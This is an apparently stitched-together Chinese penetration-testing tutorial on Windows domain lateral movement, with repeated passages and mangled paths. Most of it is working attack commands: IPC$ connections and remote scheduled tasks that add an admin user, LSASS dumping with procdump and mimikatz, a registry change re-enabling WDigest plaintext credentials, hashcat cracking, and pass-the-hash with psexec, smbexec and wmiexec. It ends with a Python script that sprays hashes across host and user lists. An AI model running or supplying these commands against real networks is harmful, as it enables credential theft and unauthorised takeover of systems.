hashcat命令复制 内网渗透-横向渗透1

内网渗透-横向渗透1

在攻陷一台内网主机后，我们可以通过收集本地信息和用户凭证等数据，来实施横向渗透攻击以获取更多主机的控制权。本文将介绍at和schtasks命令的使用方法，通过已知目标系统用户的明文密码，我们可以直接在远程主机上执行命令。

攻击流程如下：首先获取某个域主机的权限，使用minikatz工具获取密码（明文或哈希），然后将域用户列表作为用户名字典，将密码明文作为密码字典，尝试连接目标主机。接下来，我们可以创建计划任务（at或schtasks）来执行后门或其他相关命令。

具体操作步骤如下：首先建立IPC连接到目标主机，将要执行的命令脚本复制到目标主机上，查看目标时间并创建计划任务（at或schtasks）来定时执行复制的脚本，最后删除IPC连接。

在建立IPC连接时可能会遇到以下常见错误代码：1）5：拒绝访问，可能是使用的用户没有管理员权限，需要先提升权限；2）51：网络问题，Windows无法找到网络路径；3）53：找不到网络路径，可能是IP地址错误、目标未开机、目标Lanmanserver服务未启动或存在防火墙等问题；4）67：找不到网络名，本地Lanmanworkstation服务未启动，目标删除了ipc$；5）1219：提供的凭据和已存在的凭据集冲突，说明已建立IPC$，需要先删除；6）1326：账号密码错误；7）1792：目标NetLogon服务未启动，连接域控时常会出现此情况；8）2242：用户密码过期，目标有账号策略要求定期更改密码。

建立IPC连接失败的原因可能有：1）目标系统不是NT或更高版本的操作系统；2）对方没有打开IPC$共享；3）对方未开启139、445端口，或者被防火墙屏蔽；4）输出命令、账号密码有错误。

at命令适用于Windows 2012以下版本，而schtasks命令适用于Windows 2012及以上版本。

下面是一个实例演示：首先进入某个域主机，然后获取域控主机的IP地址。接下来，可以使用at命令或schtasks命令来执行横向渗透攻击。在实战中，可以使用mimikatz工具获取密码。如果无法将mimikatz工具上传到目标服务器，可以使用procdump导出目标服务器的lsass进程内存文件，并在本地使用mimikatz读取密码。

另外，还有其他案例可供参考，如横向渗透明文HASH传递使用atexec-impacket工具，以及域横向SMB和WMI明文或哈希传递的方法。对于某些情况，如Windows 2012以上版本默认关闭了wdigest，攻击者无法从内存中获取明文密码；而Windows 2012以下版本，如果安装了KB2871997补丁，也会导致无法获取明文密码。针对这些情况，我们提供了四种解决方案，包括注册表修改、Procdump+Mimikatz配合获取、Hashcat破解获取Windows NTML Hash等方法。

在域横向移动中，我们还可以利用psexec、smbexec等工具进行攻击。psexec可以通过建立IPC连接来传递明文或哈希，而smbexec则无需先建立IPC连接，直接传递明文或哈希。此外，还可以利用WMI服务进行攻击，包括使用cscript、wmiexec、wmic等工具。WMI是通过135端口进行利用的，支持用户名明文或哈希的认证方式，并且不会在目标日志系统留下痕迹。

最后，我们还介绍了使用Python编译exe的方式来批量利用域横向移动中的以上服务和哈希传递。

net use \serveripc$"password" /user:username # 工作组
net use \serveripc$"password" /user:domainusername #域内
dir \xx.xx.xx.xxC$ # 查看文件列表
copy \xx.xx.xx.xxC$1.bat 1.bat # 下载文件
copy 1.bat \xx.xx.xx.xxC$ # 复制文件
net use \xx.xx.xx.xxC$1.bat /del # 删除 IPC
net view xx.xx.xx.xx # 查看对方共享

建立IPC连接失败的原因可能有：1）目标系统不是NT或更高版本的操作系统；2）对方没有打开IPC$共享；3）对方未开启139、445端口，或者被防火墙屏蔽；4）输出命令、账号密码有错误。

net use \192.168.1.21ipc$ "password" /user:xy.comadministrator 
# 建立 ipc 连接：
copy add.bat \192.168.3.21c$ 
#拷贝执行文件到目标机器
at \192.168.3.21 15:47 c:add.bat 
#添加计划任务

net use \192.168.3.32ipc$ "password" /user:xy.comadministrator 
# 建立 ipc 连接：
copy add.bat \192.168.1.1c$ 
#复制文件到其 C 盘
schtasks /create /s 192.168.1.1 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:add.bat /F 
#创建 adduser 任务对应执行文件
schtasks /run /s 192.168.1.1 /tn adduser /i 
#运行 adduser 任务
schtasks /delete /s 192.168.1.11 /tn adduser /f
#删除 adduser 任务

net time /domain		#获取当前域控主机名称

使用环境：at命令适用于Windows 2012以下版本，schtasks命令适用于Windows 2012及以上版本。

实例演示：

首先进入某个域主机。

1.使用：

nslookup DD.xy.com		#获取域控主机ip地址				
ping 域控主机			 #两种方式都行

net use \192.168.1.100ipc$ "123456" /user:xy.comadministrator # 建立 ipc 连接：
copy add.bat \192.168.1.21c$ #拷贝执行文件到目标机器
at \192.168.1.21 15:47 c:add.bat #添加计划任务

add.bat文件内容
net user admin password /add		#添加用户名密码

privilege::debug				提权命令
sekurlsa::logonpasswords		抓取密码命令

procdump64.exe -accepteula -ma lsass.exe lsass.dmp 

2.获取域控主机IP地址。

3.接下来使用at命令或schtasks命令。

4.实战时使用mimikatz获取密码。在DOS运行界面中输入。

找到密码后，我们可以验证密码是否正确，打开控制面板输入原来的密码看是否能够修改。如果能够修改，则说明密码正确。

另外，当无法上传mimikatz工具到目标服务器时，可以利用procdump将lsass进程的内存文件导出到本地，然后再使用mimikatz读取密码。

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

atexec.exe ./administrator:password@192.168.1.1 "whoami"				#password处输入密码
atexec.exe god/administrator:password@192.168.1.1 "whoami"
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.1.1 "whoami"

将导出的文件命名为lsass.dump。

将lsass.dmp文件放在mimikatz目录下，然后使用以下命令读取密码。

这样就可以读取到密码的SHA1加密形式。

其他案例：

1.横向渗透明文HASH传递atexec-impacket（可能会被杀毒软件查杀）。

FOR /F %%i in (ips.txt) do net use \%%iipc$ "password" /user:administrator
#批量检测 IP 对应明文连接			#保存文件后缀名.bat,批处理文件
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:password@%%i whoami 
#批量检测 IP 对应明文回显版
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami 
#批量检测明文对应 IP回显版
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami 
#批量检测HASH 对应 IP 回显版

2.横向渗透明文HASH传递批量利用-综合。

2.域横向SMB&WMI明文或哈希传递。

知识点1：Windows 2012以上版本默认关闭wdigest，攻击者无法从内存中获取明文密码。Windows 2012以下版本，如果安装了KB2871997补丁，也会导致无法获取明文密码。针对这些情况，我们提供了四种解决方案。

reg add
HKLM SYSTEMCurrentControlSetControlSecurityProvidearsWDigest /v UseLogonCredential /t REG DWORD /d 1 /f

知识点2：Windows系统LM Hash及NTLM Hash加密算法。个人系统在Windows Vista后，服务器系统在Windows 2003以后，认证方式均为NTLM Hash。

注册表修改：

procdump -accepteula -ma lsass.exe lsass.dmp
procdump64.exe -accepteula -ma lsass.exe lsass.dmp 
mimikatz 上执行：
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

hashcat -a 0-m 1000hash file --force

https://www.freebuf.com/sectool/164507.html

net use \192.168.1.1ipc$ "password" /user:administrator
psexec \192.168.1.1 -s cmd 		# 需要先有 ipc 链接 -s 以 System 权限运行

1.Procdump+Mimikatz配合获取。

2.Hashcat破解获取Windows NTML Hash。

参考：

3.域横向移动SMB服务利用-psexec,smbexec。

psexec第一种：先建立IPC连接，psexec需要明文或哈希传递。

psexec \192.168.1.1 -u administrator -p Admin12345 -s cmd	#有账号密码
psexec -hashes :$HASH$ ./administrator@10.10.10.10
psexec -hashes :$HASH$ domain/administrator@10.10.10.10
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.1.1
官方 Pstools 无法采用 hash 连接
需要非官方自带-参考 impacket 工具包使用，操作简单，容易被杀

https://gitee.com/RichChigga/impacket-examples-windows

smbexec god/administrator:Admin12345@192.168.1.1
smbexec ./administrator:admin!@#45@192.168.1.1
smbexec -hashes :$HASH$ ./admin@192.168.1.1
smbbexec -hashes :$HASH$ domain/admin@192.168.1.1
smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.1.1
smbexec -hashes :ccef208c6485269c20db2cad21734fe7god/administrator@192.168.1.1

wmic /node:192.168.1.1 /user:administrator /password:Admin12345 process call create "cmd.exe /c 
ipconfig >C:1.txt"

psexec第二种：不用建立IPC连接，直接提供明文账户密码（推荐使用第二种）。

smbexec无需先建立IPC连接，明文或哈希传递。

4.域横向移动WMI服务利用-cscript,wmiexec,wmic。

WMI（Windows Management Instrumentation）是通过135端口进行利用的，支持用户名明文或哈希的认证方式，并且该方法不会在目标日志系统留下痕迹。

自带WMIC明文传递，无回显。

cscript //nologo wmiexec.vbs /shell 192.168.1.1 administrator Admin12345

wmiexec ./administrator:admin!@#45@192.168.1.1 "whoami"
wmiexec god/administrator:Admin12345@192.168.1.1 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.1.1 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.1.1 "whoami"

pyinstaller.exe -F fuck_neiwang_002.py
import os,time
ips={
'192.168.1.1',
'192.168.1.2',
'192.168.1.3',
'192.168.1.4',
'192.168.1.5'
}
users={
'Administrator',
'boss',
'dbadmin',
'fileadmin',
'mack',
'mary',
'webadmin'
}
hashs={
'ccef208c6485269c20db2cad21734fe7',
'518b98ad4178a53695dc997aa02d455c'
}
for ip in ips:
    for user in users:
        for mimahash in hashs:
#wmiexec -hashes :hashgod/user@ipwhoami
            exec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"
            print('--->' + exec + '<---')
            os.system(exec)
            time.sleep(0.5)

自带cscript明文传递，有回显。

套件impacket wmiexec明文或哈希传递，有回显。

exe版本。

5.域横向移动以上服务哈希批量利用-python编译exe。